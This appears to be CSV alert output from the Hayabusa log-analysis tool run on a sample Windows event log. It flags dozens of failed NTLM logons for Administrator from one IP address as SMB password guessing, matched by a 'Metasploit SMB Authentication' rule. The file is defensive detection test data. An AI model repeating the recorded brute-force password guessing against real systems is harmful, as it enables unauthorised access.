SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3u3YUCKxEo5pnKJX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wen3pHM88kSRkHNf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dGDHJ4KMm2zEMV0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: lKZAB1nfXPYSLxsE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tYkOsX0XDpkdvp01 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r9y7HjOeGPcrdj1c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RLwh8Lg3nvbm8Q2p : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QoMkBcp8ouIgpX4m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2UnrDiOAOec5DQGQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UxJGLShj5EDKLSDZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iWhaz8W0VLQdXKWN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 82YDxSIBnCAqdK4c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 795b7XqsxokIGJyM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 1BmnyTsmP2XqMzf1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NB3xsYe3RcPXhDib : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxN9i8exdO2h4oa7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vjcQaeuo4f8wFXhv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zCzr77BhliB4KKeb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z558005RepKaO1zZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HFzW25mJz4JLkv7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y7J8m97GQWt2cbSs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJrVwcpABBaZ8cyY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VcDw3I4BaFLdIeCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: egEpV9aAuCFjwx2I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: th0ZLWF4YeOaNnkK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ahrOLfdy6DCQ9SfO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xiooSdP5eib8PUE3 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s6nQ2jp9IGYnGeyD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ejMtyR5QNdJFhw1W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e50kO0aVhfw5np5T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 176XyLw6IhEI6NuD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KXCzCSSFvpbWNJFd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XhHRuZYlH8hekaKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ZGIUBFRMQ3OBbOA0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R7CTT5g1w58eRRlS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmVccmad66uOK9ox : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t1jlT6kEcs14dcNZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rBty5jOGkkZSZEyD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Ci7YUsO5MtFkDSW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 12JToliq9mmAuMTQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lw9AgAvBGWoXBlim : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ReGDyvRpGknAKqqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6mdUn8na4asRfpJP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: b7Wm5p4HnNCbkyh2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MQZwerVd6E08X8Ou : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbDjtLKoX5Q77bn5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O7BNKHiPjzJKCaDk : IP Address: 192.168.198.149 : AuthPackage: 
